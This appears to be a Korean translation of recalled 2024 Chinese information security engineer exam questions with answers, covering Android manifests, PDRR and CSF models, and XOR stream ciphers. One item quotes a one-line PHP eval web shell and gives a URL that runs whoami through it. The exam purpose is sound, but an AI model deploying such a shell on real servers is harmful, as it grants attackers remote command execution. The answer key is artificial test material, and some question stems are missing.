
2024年信息安全工程师、2024InformationSecurityEngineer
2024 정보 보안 엔지니어, 2024InformationSecurityEngineer
软考-시험 시간 : 2024年11月08日
서명이 저장되는 디렉터리/파일___ (2점) 답: META-INF
권한이 저장되는 디렉터리/파일___ (2점) 답: AndroidManifest.xml
5문항 (10점) (1)어떤 설정이 백업을 지원하는가; (2)과거 위치 정보를 읽을 수 있는데, 보안상 위험이 있는가; (3)구성 파일에서 4대 컴포넌트 중 어느 것이 사용되었는가; (4)어떤 컴포넌트의 정보 유출 위험이 가장 높은가; (5)정보 남용이 존재하는가? 자세히 설명하시오;
답: (1)backup...... 백업 미지원 (2)위험이 존재함, 알 수 없는 정보가 유출될 위험이 있음 (3)Activity、BroadcastRecevier (4)Contentprovider (5)정보 남용이 존재함, 위치 권한, 카메라 권한, 저장 권한, 연락처, 멀티미디어, 블루투스 등 많은 권한이 과도하게 수집되고 있음
안드로이드에서 사용자에게 root 권한이 있는가 (2점) 답: 없음
어떤 보안 모델인가___ (2점) 답: PDRR
알 수 없음
방화벽은 어떤 핵심 기능인가___ (2점) 답: 보호
2문항 (4점) (1)CSF가 PDRR보다 추가된 핵심 기능은 무엇인가___ (2점) 답: 식별 (2)위험 평가는 CSF의 어떤 기능에 속하는가___ (2점) 답: 식별
자산 식별 외에, 또 어떤 세 가지 식별이 있는가___ (3점) 답: 위험 식별;취약성 식별;기존 보안 대책 식별
<?php @eval($_GET["cmd"]); ?> (5점)
- 이 파일에 해당하는 연결 비밀번호는 무엇인가 답: cmd
- http 어떤 요청 메서드인가 답: GET
- 도메인이 abc.com이라고 가정할 때, whoami를 실행하는 전체 요청 URL 답: abc.com/shell.php?cmd=system("whoami")
- 대칭 및 비대칭 외에, 평문의 처리 방식에 따라 어떻게 더 암호화할 수 있는가 (2점) 답: 블록 암호화 및 스트림 암호화
- a의 8bit (2점) 답: 97 ---》 01100001
- a와 abc를 XOR 암호화한 결과 (6점) 답: 032 또는 00000000 00000011 00000010
- mi, ki, ci가 주어졌을 때, 평문을 구하는 식은 무엇인가 (2점) 답: mi = ki XOR(^) ci
- 서로 다른 두 평문이 동일한 스트림 암호 키로 암호화되어도 안전한가? 왜인가? (2점) 답: 안전하지 않음, 하나의 평문에서 다른 평문을 유추할 수 있음
- 블록 암호는 스트림 암호를 사용할 수 있는가 (1점) 답: 할 수 있음